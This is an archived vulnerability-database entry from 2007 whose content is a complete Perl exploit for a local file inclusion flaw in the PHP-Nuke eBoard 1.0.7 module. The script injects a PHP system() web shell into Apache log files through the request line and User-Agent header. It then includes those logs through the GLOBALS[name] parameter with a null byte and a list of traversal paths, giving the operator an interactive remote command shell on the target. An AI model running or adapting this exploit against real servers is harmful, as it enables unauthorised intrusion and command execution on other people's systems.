PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

2007-04-10T00:00:00
ID SSV:6604
Type seebug
Reporter Root
Modified 2007-04-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!Perl
#
#PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
#
#Vendor: http://www.complex-berlin.de/modules.php?name=Downloads&d_op=getit&lid=975
#
#
#Coded by bd0rk || SOH-Crew
#
#Greetz: str0ke, TheJT, MereX, mymaster
#

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);

if (@ARGV < 3) {
print \"
PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
###############################################################
Usage: exploit.pl [victim] /modules/eBoard/ [apachepath]
###############################################################
\";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print \"Code is injecting in logfiles...
\";
$CODE=\"<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\";
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";
print $socket \"GET \".$path.$CODE.\" HTTP/1.1
\";
print $socket \"user-Agent: \".$CODE.\"
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Connection: close

\";
close($socket);
print \"Write END to exit!
\";
print \"If not working try another apache path

\";

print \"[shell] \";$cmd = <STDIN>;

while($cmd !~ \"END\") {
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";

#now include parameter

print $socket \"GET \".$path.\"member.php?GLOBALS[name]=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Accept: */*
\";
print $socket \"Connection: close

\";

while ($raspuns = <$socket>)
{

print $raspuns;
}

print \"[shell] \";
$cmd = <STDIN>;
}